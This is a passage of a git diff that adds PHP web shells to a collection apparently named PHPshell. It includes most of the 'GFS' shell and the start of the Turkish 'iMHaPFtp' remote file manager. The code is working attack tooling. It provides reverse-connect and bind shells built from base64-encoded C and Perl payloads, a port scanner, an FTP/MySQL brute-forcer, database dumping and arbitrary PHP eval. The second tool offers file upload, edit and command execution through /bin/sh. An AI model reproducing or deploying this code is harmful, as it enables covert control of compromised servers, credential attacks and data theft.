name=\"b_run\"></td></tr>"; + echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"$dir\" name=\"wdir\"></td>"; + echo "</tr></table></form>"; + } + echo "<hr size=3 color=black>"; +#################### UPLOAD #################################################### + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Upload files: </b></td></tr><font size=-2>"; + if ($box==""){ $box="fopen";} + echo ("<tr><td alling=\"center\"><b>Use/from: </b><SELECT name=\"box\">"); + echo("<OPTION>$box</option>"); + echo("<OPTION value=\"PC\">PC</option> + <option value=\"WGET\">WGET</option><option value=\"FETCH\"> + FETCH</option><option value=\"LYNX\">LYNX</option> + <option value=\"cURL\">cURL</option> + <option value=\"fopen\">fopen</option></select></td></tr>"); + echo "<tr><td alling=\"center\"><b>File: </b><input type=\"text\" name=\"lfilename\" size=50></td></tr>"; + echo "<tr><td alling=\"center\"><b>Target: </b><input type=\"text\" name=\"tfilename\" + size=30 value=\"$tfilename\"></td></tr>"; + echo "<tr><td alling=\"center\"><input type=\"submit\" name=\"b_upload\" value=\"UPLOAD\"></td></tr></table></form></font></font>"; + echo "<hr size=3 color=black>"; +##################### MySQL #################################################### + if(isset($_POST['host'])){ + $host=$_POST['host']; + } + if(isset($_POST['dbname'])){ + $dbname=$_POST['dbname']; + } + if(isset($_POST['tablename'])){ + $tablename=$_POST['tablename']; + } + if(isset($_POST['sql'])){ + $sql=$_POST['sql']; + } + if(isset($_POST['sfilename'])){ + $filename=$_POST['sfilename']; + } + if(isset($_POST['dfilename'])){ + $dfilename=$_POST['dfilename']; + } + if(isset($_POST['username'])){ + $username=$_POST['username']; + } + if(isset($_POST['pass'])){ + $pass=$_POST['pass']; + } + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>MySQL DB connect: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><b>Host name:</b></td>"; + echo "<td alling=\"center\"><b>DB name:</b></td>"; + echo "<td alling=\"center\"><b>Table name:</b></td>"; + echo "<td alling=\"center\"><b>SQL command: </b></td></tr>"; + echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"host\" value=\"$host\"></td>"); + echo ("<td alling=\"center\"><input type=\"text\" name=\"dbname\" value=\"$dbname\"></td>"); + echo ("<td alling=\"center\"><input type=\"text\" name=\"tablename\" value=\"$tablename\"></td>"); + echo ("<td alling=\"center\"><input type=\"text\" name=\"sql\" value=\"$sql\"></td></tr>"); + echo "<tr><td alling=\"center\"><b>User name:</b></tb>"; + echo "<td alling=\"center\"><input type=\"submit\" name=\"b_base\" value=\"Dump DB\"></td>"; + echo "<td alling=\"center\"><input type=\"submit\" name=\"b_table\" value=\"Dump table\"></td>"; + echo "<td alling=\"center\"><input type=\"submit\" name=\"b_runsql\" value=\"Run SQL\"></tb></tr>"; + echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"username\" value=\"$username\"></td><td alling=\"center\"></td><td alling=\"center\"><input type=\"submit\" name=\"b_dtable\" value=\"Download\"></td></tr>"); + echo "<tr><td alling=\"center\"><b>Pass: </b></td>"; + if ($safe_mode){ + echo "<td alling=\"center\"><b>OpenFilename: </b></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>"; + }else + echo "<td alling=\"center\"></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>"; + echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"pass\" value=\"$pass\"></td>"); + if ($safe_mode){ + echo "<td alling=\"center\"><input type=\"text\" name=\"sfilename\" value=\"$filename\"></td><td alling=\"center\"><input type=\"text\" name=\"b_dfilename\" value=\"$dfilename\"></td></tr>"; + }else + echo "<td alling=\"center\"></td><td alling=\"center\"><input type=\"text\" name=\"dfilename\" value=\"$dfilename\"></td></tr>"; + echo ("<tr><td alling=\"center\"><input type=\"submit\" name=\"b_mydb\" value=\"Show exists DB\"></td>"); + if ($safe_mode){ + echo ("<td alling=\"center\"><input type=\"submit\" name=\"b_safe_fuck\" value=\"SafeMode FileOpen\"></td>"); + }else + echo "<td alling=\"center\"></td>"; + echo("<td alling=\"center\"><input type=\"submit\" name=\"b_dfilename\" value=\"Dump table\"></td>"); + echo "</tr></table></font></font>"; + echo "<hr size=3 color=black>"; +################## NAVIGATION ################################################## + list_dir(); +} +##################### PortScan ################################################# +if($r_act=="port"){ + if($_POST['host']==""){ + $host="localhost"; + }else + $host=$_POST['host']; + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Scan host: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$host."\" name=\"host\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Scan\" name=\"b_scan\"></td></tr>"; + echo "</tr></table></form>"; + if($_POST['b_scan']){ + portscan($host); + } +} +##################### PortBind ################################################# +if($r_act=="bind"){ + if($_POST['b_bind']){ + if($_POST['box']=="C++"){ + save_file(base64_decode($port_c),"/var/tmp/gfs.c",getcwd()); + ex("gcc /var/tmp/gfs.c"); + unlink("/var/tmp/gfs.c"); + ex("/var/tmp/a.out ".$_POST['port']." &"); + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center><b>".$s."</b></td></tr>"; + echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; + echo ex("ps -aux | grep a.out"); + echo "</textarea></td></tr></table>"; + } + if($_POST['box']=="Perl"){ + save_file(base64_decode($port_pl),"/var/tmp/gfs.pl",getcwd()); + ex("perl /var/tmp/gfs.pl ".$_POST['port']." &"); + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center><b>".$s."</b></td></tr>"; + echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; + echo ex("ps -aux | grep gfs.pl"); + echo "</textarea></td></tr></table>"; + } + } + if($_POST['b_connect']){ + if($_POST['box']=="C++"){ + save_file(base64_decode($back_connect_c),"/var/tmp/gfs.c",getcwd()); + ex("gcc -o /var/tmp/gfs.c /var/tmp/gfs"); + unlink("/var/tmp/gfs.c"); + ex("/var/tmp/gfs ".$_POST['ip']." ".$_POST['port']." &"); + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center><b>".$s."</b></td></tr>"; + echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; + echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ..."; + echo "</textarea></td></tr></table>"; + } + if($_POST['box']=="Perl"){ + save_file(base64_decode($back_connect_pl),"/var/tmp/gfs.pl",getcwd()); + ex("perl /var/tmp/gfs.pl ".$_POST['ip']." ".$_POST['port']." &"); + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center><b>".$s."</b></td></tr>"; + echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; + echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ..."; + echo "</textarea></td></tr></table>"; + } + } + if($_POST['b_proxy']){ + save_file(stripslashes(base64_decode($prx1).$_POST['port'].base64_decode($prx2)),"/var/tmp/gfs.pl",getcwd()); + ex("perl /var/tmp/gfs.pl"); + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center><b>Proxy</b></td></tr>"; + echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; + echo ex("ps -aux | grep gfs.pl"); + echo "</textarea></td></tr></table>"; + } + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Bind Port: </b></td></tr><font size=-2>"; + echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">"); + echo("<OPTION value=\"C++\">C++</option> + <option value=\"Perl\">Perl</option></select></td></tr>"); + echo "<tr><td alling=\"center\"><b><font face=Verdana size=2>BindPort: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"26660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Bind\" name=\"b_bind\"></td></tr>"; + echo "</tr></table></form>"; + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Back connect: </b></td></tr><font size=-2>"; + echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">"); + echo("<OPTION value=\"C++\">C++</option> + <option value=\"Perl\">Perl</option></select></td></tr>"); + echo "<tr><td alling=\"center\"><b><font face=Verdana size=2>RemotePort: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"26660\" name=\"port\"></td></tr>"; + echo "<tr><td alling=\"center\"><b><font face=Verdana size=2>RemoteIp: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$REMOTE_ADDR."\" name=\"ip\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Connect\" name=\"b_connect\"></td></tr>"; + echo "</tr></table></form>"; + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>HTTPProxy: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><b><font face=Verdana size=2>ProxyPort: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"46660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Create\" name=\"b_proxy\"></td></tr>"; + echo "</tr></table></form>"; +} +##################### Brute #################################################### +if($r_act=="brute"){ + if(isset($_POST['brute_host'])){ + $host=$_POST['brute_host']; + }else + $host="localhost"; + if(isset($_POST['lib'])){ + $lib=$_POST['lib']; + }else + $lib=" [library]"; + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Brute: </b></td></tr><font size=-2>"; + echo "<tr bgcolor=#00ff00><td alling=\"center\"><b>Example lib: </b>login:pass</td></tr>"; + echo ("<tr><td alling=\"center\"><b>Bryte type: </b><SELECT name=\"box1\">"); + echo("<option value=\"login:login\">login:login</option> + <option value=\"login:nigol\">login:nigol</option> + <option value=\"login:empty\">login:empty</option> + <option value=\"login:number\">login:number</option>"); + if(function_exists(fopen)){ + echo "<option value=\"login:lib\">login:lib</option>"; + echo "<option value=\"lib:lib\">lib:lib</option>"; + } + echo ("</select></td></tr>"); + echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">"); + echo("<OPTION value=\"mysql\">mysql</option> + <option value=\"ftp\">ftp</option>"); +// if(function_exists(ssh2_connect)){ +// echo "<option value=\"ssh\">ssh</option>"; +// } + echo ("</select></td>"); + echo("<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Brute\" name=\"b_brute\"></td></tr><tr><td alling=\"center\"><b>Host: </b><input type=\"text\" name=\"brute_host\" value=\"".$host."\">(for lib:lib)</td></tr>"); + if(function_exists(fopen)){ + echo "<td alling=\"center\"><b>From lib (if set): <input type=\"text\" name=\"lib\" value=\"".$lib."\">"; + } + echo ("</table></form>"); + if($_POST['b_brute']){ + brute($_POST['box'],$_POST['box1'],$_POST['brute_host'],$_POST['lib']); + } +} +#################### Eval ###################################################### +if($r_act=="eval"){ + if($_POST['b_eval']){ + $eval=str_replace("<?","",$_POST['php_eval']); + $eval=str_replace("?>","",$eval); + eval($eval); + } + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Eval php: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><textarea name=\"php_eval\" cols=90 rows=15></textarea></td></tr><tr><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Eval\" name=\"b_eval\"></td></tr>"; + echo "</tr></table></form>"; +} + +echo "<hr size=3 color=black>"; +echo "<font face=Verdana size=2 color=blue><b>"; +echo (rep_char("&nbsp",15)); +echo "(c) GFS</font>"; +echo (rep_char("&nbsp",15)); +echo "<a href=\"http://www.gfs-team.ru\">www.gfs-team.ru</a>"; +echo "<hr size=3 color=black>"; +?> diff --git a/php/PHPshell/gfs_sh/gfs_sh2.jpg b/php/PHPshell/gfs_sh/gfs_sh2.jpg new file mode 100644 index 0000000..846d58b Binary files /dev/null and b/php/PHPshell/gfs_sh/gfs_sh2.jpg differ diff --git a/php/PHPshell/iMHaPFtp/iMHaPFtp.jpg b/php/PHPshell/iMHaPFtp/iMHaPFtp.jpg new file mode 100644 index 0000000..660bd2b Binary files /dev/null and b/php/PHPshell/iMHaPFtp/iMHaPFtp.jpg differ diff --git a/php/PHPshell/iMHaPFtp/iMHaPFtp.php b/php/PHPshell/iMHaPFtp/iMHaPFtp.php new file mode 100644 index 0000000..2c003b7 --- /dev/null +++ b/php/PHPshell/iMHaPFtp/iMHaPFtp.php @@ -0,0 +1,2061 @@ +<?php +/* + * iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru + * Copyright (C) 2003-2005 iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com> + * + * Bu Kod Tamamiyle ضzgür Yazilimdir. + * Kِtü Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir + * Programin amaci ftp olmadan hostunuza baglanti kurup + * Dosya ekleyip kaldira bilmektir. + * Kodumuz 6 Dilde yazilmistir.Server Diline Gِre Otomatik Secim Yapar. + * ------------------------------------------------------------------------- + * Kodu hosta attiktan sonra adres cubuguna kodun uzantisini verip baglanin + * Ve Asla kimseye bu kodun uzantisini vermeyiniz.!! + * ------------------------------------------------------------------------- + * + * iMHaBiRLiGi PhpFtp V1.1 + * ========================================================================= + * + * BeweiS + * <BeweiS@imhabirligi.com> + * iMHaBiRLiGi Administrator + * Php-Asp-Programlama ve Güvenlik + * + * MicroP_ + * <MicroP_@imhabirligi.com> + * iMHaBiRLiGi Administrator + * Php-Asp-Programlama ve Güvenlik + * + * Libertical + * <libertical@imhabirligi.com> + * iMHaBiRLiGi Yِnetim + * C++, Delphi,Programlama ve Linux Hastasi + * + * PowerGhost + * <powerghost@imhabirligi.com> + * iMHaBiRLiGi Sistem Danismani + * Sistem Danismani + * + * BadSector + * ozgurkaleli@yahoo.com + * iMHaBiRLiGi Yِnetim + * VicualBasic-Delphi Programlama + * Sistemdanismani ve Linux Hastasi + * + * Bu kodun yaziliminda ismi gecen her arkadasimizin + * Katkilari bulunmustur. + * Herbiri ilgi alaninda Basarili olduklari konularda kodumuzu gelistirmemize + * Katkida bulunmuslardir. + * NOT: Kod Hakkinda takildiniz konulari iMHaBiRLiGi Forumlarina Sora bilirsiniz + * http://www.imhabirligi.com + *<iMHaBiRLiGi@imhabirligi.com> +/* ------------------------------------------------------------------------- */ + +/* Diller : + * 'en' - English + * 'de' - German + * 'fr' - French + * 'it' - Italian + * 'se' - Swedish + * 'auto' - autoselect + */ +$lang = 'auto'; + +/* Charset of your filenames: + */ +$charset = 'ISO-8859-1'; + +/* Homedir: + * For example: './' - the script's directory + */ +$homedir = './'; + +/* Size of the Düzenle textarea + */ +$Düzenlecols = 80; +$Düzenlerows = 25; + +/* ------------------------------------------- + * Optional configuration (reTasi # to enable) + */ + +/* Permission of created directories: + * For example: 0705 would be 'drwx---r-x'. + */ +# $dirpermission = 0705; + +/* Permission of created files: + * For example: 0604 would be '-rw----r--'. + */ +# $filepermission = 0604; + +/* Filenames related to the apache web server: + */ +$htaccess = '.htaccess'; +$htpasswd = '.htpasswd'; + +/* ------------------------------------------------------------------------- */ + +if (get_magic_quotes_gpc()) { + array_walk($_GET, 'strip'); + array_walk($_POST, 'strip'); + array_walk($_REQUEST, 'strip'); +} + +if (array_key_exists('image', $_GET)) { + header('Content-Type: image/gif'); + die(getimage($_GET['image'])); +} + +$delim = DIRECTORY_SEPARATOR; + +if (function_exists('php_uname')) { + $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; +} else { + $win = ($delim == '\\') ? true : false; +} + +if (!empty($_SERVER['PATH_TRANSLATED'])) { + $scriptdir = dirname($_SERVER['PATH_TRANSLATED']); +} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) { + $scriptdir = dirname($_SERVER['SCRIPT_FILENAME']); +} elseif (function_exists('getcwd')) { + $scriptdir = getcwd(); +} else { + $scriptdir = '.'; +} +$homedir = relative2absolute($homedir, $scriptdir); + +$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir; + +if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) { + $dir = relative2absolute($dir, $_POST['olddir']); +} + +$directory = simplify_path(addslash($dir)); + +$files = array(); +$action = ''; +if (!empty($_POST['submit_all'])) { + $action = $_POST['action_all']; + for ($i = 0; $i < $_POST['num']; $i++) { + if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') { + $files[] = $_POST["file$i"]; + } + } +} elseif (!empty($_REQUEST['action'])) { + $action = $_REQUEST['action']; + $files[] = relative2absolute($_REQUEST['file'], $directory); +} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) { + $files[] = $_FILES['upload']; + $action = 'upload'; +} elseif (array_key_exists('num', $_POST)) { + for ($i = 0; $i < $_POST['num']; $i++) { + if (array_key_exists("submit$i", $_POST)) break; + } + if ($i < $_POST['num']) { + $action = $_POST["action$i"]; + $files[] = $_POST["file$i"]; + } +} +if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) { + $files[] = relative2absolute($_POST['create_name'], $directory); + switch ($_POST['create_type']) { + case 'directory': + $action = 'create_directory'; + break; + case 'file': + $action = 'create_file'; + } +} +if (sizeof($files) == 0) $action = ''; else $file = reset($files); + +if ($lang == 'auto') { + if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) { + $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2); + } else { + $lang = 'en'; + } +} + +$words = getwords($lang); + +$cols = ($win) ? 4 : 7; + +if (!isset($dirpermission)) { + $dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755; +} +if (!isset($filepermission)) { + $filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644; +} + +if (!empty($_SERVER['SCRIPT_NAME'])) { + $self = html(basename($_SERVER['SCRIPT_NAME'])); +} elseif (!empty($_SERVER['PHP_SELF'])) { + $self = html(basename($_SERVER['PHP_SELF'])); +} else { + $self = ''; +} + +if (!empty($_SERVER['SERVER_SOFTWARE'])) { + if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') { + $apache = true; + } else { + $apache = false; + } +} else { + $apache = true; +} + +switch ($action) { + +case 'view': + + if (is_script($file)) { + + /* highlight_file is a mess! */ + ob_start(); + highlight_file($file); + $src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents()); + $src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src); + ob_end_clean(); + + html_header(); + echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2> + +<hr /> + +<table> +<tr> +<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray"> +<pre style="margin-top: 0"><code>'; + + for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n"; + + echo '</code></pre> +</td> +<td style="text-align: left; vertical-align: top; padding-left: 3pt"> +<pre style="margin-top: 0">' . $src . '</pre> +</td> +</tr> +</table> + +'; + + html_footer(); + + } else { + + header('Content-Type: ' . getmimetype($file)); + header('Content-Disposition: filename=' . basename($file)); + + readfile($file); + + } + + break; + +case 'indir': + + header('Pragma: public'); + header('Expires: 0'); + header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); + header('Content-Type: ' . getmimetype($file)); + header('Content-Disposition: attachment; filename=' . basename($file) . ';'); + header('Content-Length: ' . filesize($file)); + + readfile($file); + + break; + +case 'upload': + + $dest = relative2absolute($file['name'], $directory); + + if (@file_exists($dest)) { + listing_page(error('already_exists', $dest)); + } elseif (@Tasi_uploaded_file($file['tmp_name'], $dest)) { + listing_page(notice('uploaded', $file['name'])); + } else { + listing_page(error('not_uploaded', $file['name'])); + } + + break; + +case 'create_directory': + + if (@file_exists($file)) { + listing_page(error('already_exists', $file)); + } else { + $old = @umask(0777 & ~$dirpermission); + if (@mkdir($file, $dirpermission)) { + listing_page(notice('created', $file)); + } else { + listing_page(error('not_created', $file)); + } + @umask($old); + } + + break; + +case 'create_file': + + if (@file_exists($file)) { + listing_page(error('already_exists', $file)); + } else { + $old = @umask(0777 & ~$filepermission); + if (@touch($file)) { + Düzenle($file); + } else { + listing_page(error('not_created', $file)); + } + @umask($old); + } + + break; + +case 'execute': + + chdir(dirname($file)); + + $output = array(); + $retval = 0; + exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval); + + $error = ($retval == 0) ? false : true; + + if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>'); + + if ($error) { + listing_page(error('not_executed', $file, implode("\n", $output))); + } else { + listing_page(notice('executed', $file, implode("\n", $output))); + } + + break; + +case 'Sil': + + if (!empty($_POST['no'])) { + listing_page(); + } elseif (!empty($_POST['yes'])) { + + $failure = array(); + $success = array(); + + foreach ($files as $file) { + if (del($file)) { + $success[] = $file; + } else { + $failure[] = $file; + } + } + + $message = ''; + if (sizeof($failure) > 0) { + $message = error('not_Sild', implode("\n", $failure)); + } + if (sizeof($success) > 0) { + $message .= notice('Sild', implode("\n", $success)); + } + + listing_page($message); + + } else { + + html_header(); + + echo '<form action="' . $self . '" method="post"> +<table class="dialog"> +<tr> +<td class="dialog"> +'; + + request_dump(); + + echo "\t<b>" . word('really_Sil') . '</b> + <p> +'; + + foreach ($files as $file) { + echo "\t" . html($file) . "<br />\n"; + } + + echo ' </p> + <hr /> + <input type="submit" name="no" value="' . word('no') . '" id="red_button" /> + <input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" /> +</td> +</tr> +</table> +</form> + +'; + + html_footer(); + + } + + break; + +case 'Degistir': + + if (!empty($_POST['Yol'])) { + + $dest = relative2absolute($_POST['Yol'], $directory); + + if (!@file_exists($dest) && @Degistir($file, $dest)) { + listing_page(notice('Degistird', $file, $dest)); + } else { + listing_page(error('not_Degistird', $file, $dest)); + } + + } else { + + html_header(); + + echo '<form action="' . $self . '" method="post"> + +<table class="dialog"> +<tr> +<td class="dialog"> + <input type="hidden" name="action" value="Degistir" /> + <input type="hidden" name="file" value="' . html($file) . '" /> + <input type="hidden" name="dir" value="' . html($directory) . '" /> + <b>' . word('Degistir_file') . '</b> + <p>' . html($file) . '</p> + <hr /> + ' . word('Yol') . ': + <input type="text" name="Yol" size="' . textfieldsize($file) . '" value="' . html($file) . '" /> + <input type="submit" value="' . word('Degistir') . '" /> +</td> +</tr> +</table> + +<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p> + +</form> + +'; + + html_footer(); + + } + + break; + +case 'Tasi': + + if (!empty($_POST['Yol'])) { + + $dest = relative2absolute($_POST['Yol'], $directory); + + $failure = array(); + $success = array(); + + foreach ($files as $file) { + $filename = substr($file, strlen($directory)); + $d = $dest . $filename; + if (!@file_exists($d) && @Degistir($file, $d)) { + $success[] = $file; + } else { + $failure[] = $file; + } + } + + $message = ''; + if (sizeof($failure) > 0) { + $message = error('not_Tasid', implode("\n", $failure), $dest); + } + if (sizeof($success) > 0) { + $message .= notice('Tasid', implode("\n", $success), $dest); + } + + listing_page($message); + + } else { + + html_header(); + + echo '<form action="' . $self . '" method="post"> + +<table class="dialog"> +<tr> +<td class="dialog"> +'; + + request_dump(); + + echo "\t<b>" . word('Tasi_files') . '</b> + <p> +'; + + foreach ($files as $file) { + echo "\t" . html($file) . "<br />\n"; + } + + echo ' </p> + <hr /> + ' . word('Yol') . ': + <input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" /> + <input type="submit" value="' . word('Tasi') . '" /> +</td> +</tr> +</table> + +<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p> + +</form> + +'; + + html_footer(); + + } + + break; + +case 'Kopyala': + + if (!empty($_POST['Yol'])) { + + $dest = relative2absolute($_POST['Yol'], $directory); + + if (@is_dir($dest)) { + + $failure = array(); + $success = array(); + + foreach ($files as $file) { + $filename = substr($file, strlen($directory)); + $d = addslash($dest) . $filename; + if (!@is_dir($file) && !@file_exists($d) && @Kopyala($file, $d)) { + $success[] = $file; + } else { + $failure[] = $file; + } + } + + $message = ''; + if (sizeof($failure) > 0) { + $message = error('not_copied', implode("\n", $failure), $dest); + } + if (sizeof($success) > 0) { + $message .= notice('copied', implode("\n", $success), $dest); + } + + listing_page($message); + + } else { + + if (!@file_exists($dest) && @Kopyala($file, $dest)) { + listing_page(notice('copied', $file, $dest)); + } else { + listing_page(error('not_copied', $file, $dest)); + } + + } + + } else { + + html_header(); + + echo '<form action="' . $self . '" method="post"> + +<table class="dialog"> +<tr> +<td class="dialog"> +'; + + request_dump(); + + echo "\n<b>" . word('Kopyala_files') . '</b> + <p> +'; + + foreach ($files as $file) { + echo "\t" . html($file) . "<br />\n"; + } + + echo ' </p> + <hr /> + ' . word('Yol') . ': + <input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" /> + <input type="submit" value="' . word('Kopyala') . '" /> +</td> +</tr> +</table> + +<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p> + +</form> + +'; + + html_footer(); + + } + + break; + +case 'create_symlink': + + if (!empty($_POST['Yol'])) { + + $dest = relative2absolute($_POST['Yol'], $directory); + + if (substr($dest, -1, 1) == $delim) $dest .= basename($file); + + if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file); + + if (!@file_exists($dest) && @symlink($file, $dest)) { + listing_page(notice('symlinked', $file, $dest)); + } else { + listing_page(error('not_symlinked', $file, $dest)); + } + + } else { + + html_header(); + + echo '<form action="' . $self . '" method="post"> + +<table class="dialog" id="symlink"> +<tr> + <td style="vertical-align: top">' . word('Yol') . ': </td> + <td> + <b>' . html($file) . '</b><br /> + <input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" /> + <label for="checkbox_relative">' . word('relative') . '</label> + <input type="hidden" name="action" value="create_symlink" /> + <input type="hidden" name="file" value="' . html($file) . '" /> + <input type="hidden" name="dir" value="' . html($directory) . '" /> + </td> +</tr> +<tr> + <td>' . word('symlink') . ': </td> + <td> + <input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" /> + <input type="submit" value="' . word('create_symlink') . '" /> + </td> +</tr> +</table> + +<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p> + +</form> + +'; + + html_footer(); + + } + + break; + +case 'Düzenle': + + if (!empty($_POST['save'])) { + + $content = str_replace("\r\n", "\n", $_POST['content']); + + if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) { + listing_page(notice('saved', $file)); + } else { + listing_page(error('not_saved', $file)); + } + + } else { + + if (@is_readable($file) && @is_writable($file)) { + Düzenle($file); + } else { + listing_page(error('not_Düzenleed', $file)); + } + + } + + break; + +case 'permission': + + if (!empty($_POST['set'])) { + + $mode = 0; + if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100; + if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010; + if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001; + + if (@chmod($file, $mode)) { + listing_page(notice('permission_set', $file, decoct($mode))); + } else { + listing_page(error('permission_not_set', $file, decoct($mode))); + } + + } else { + + html_header(); + + $mode = fileperms($file); + + echo '<form action="' . $self . '" method="post"> + +<table class="dialog"> +<tr> +<td class="dialog"> + + <p style="margin: 0">' . phrase('permission_for', $file) . '</p> + + <hr /> + + <table id="permission"> + <tr> + <td></td> + <td style="border-right: 1px solid black">' . word('owner') . '</td> + <td style="border-right: 